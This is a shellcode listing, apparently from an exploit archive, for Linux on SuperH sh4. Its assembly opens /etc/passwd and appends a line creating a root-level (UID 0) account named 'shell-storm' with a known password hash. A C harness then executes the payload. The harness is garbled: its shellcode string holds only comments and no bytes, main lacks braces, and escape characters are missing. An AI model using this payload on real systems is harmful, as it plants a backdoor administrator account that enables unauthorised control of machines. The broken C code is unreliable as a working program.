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# Title : SuperH (sh4) Add root user with password
# Published : 2011-06-23
# Author :
# Previous Title : linux/x86-64 execve(/bin/sh) 52 bytes
# Next Title : Linux/MIPS - add user(UID 0) with password - 164 bytes

** Title:     Linux/SuperH - sh4 - add root user with password - 143 bytes
** Date:      2011-06-23
** Tested on: debian-sh4 2.6.32-5-sh7751r
** Author:    Jonathan Salwan - twitter: @jonathansalwan
** http://shell-storm.org
** Informations:
** -------------
**               - user: shell-storm
**               - pswd: toor
**               - uid : 0
** open:
**         mov      #5, r3
**         mova     @(130, pc), r0
**         mov      r0, r4
**         mov      #255, r13
**         mov      #4, r12
**         mul.l    r13, r12
**         sts      macl, r5
**         add      #69, r5
**         mov      #84, r13
**         mov      #5, r12
**         mul.l    r13, r12
**         sts      macl, r6
**         trapa    #2
**         mov      r0, r11
** write:
**         xor      r6, r6
**         xor      r5, r5
**         mov      #4, r3
**         mov      r11, r4
**         mova     @(20, pc), r0
**         mov      r0, r5
**         mov      #72, r6
**         trapa    #2
** close:
**         mov      #6, r3
**         mov      r11, r4
**         trapa    #2
** exit:
**         mov      #1, r3
**         xor      r4, r4
**         trapa    #2
** user:
**         .string "shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bashn"
** file:
**         .string "@@@/etc/passwd"
** The '@@@' is just for alignment.

#include <stdio.h>
#include <string.h>

char *SC = 
           /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */

           /* r11 = fd */

           /* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */

           /* close(fd) */

           /* exit(0) */

           /* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bashn */

           /* @@@/etc/passwd */ 

int main(void)
   fprintf(stdout,"Length: %dn",strlen(SC));
   (*(void(*)()) SC)();
return 0;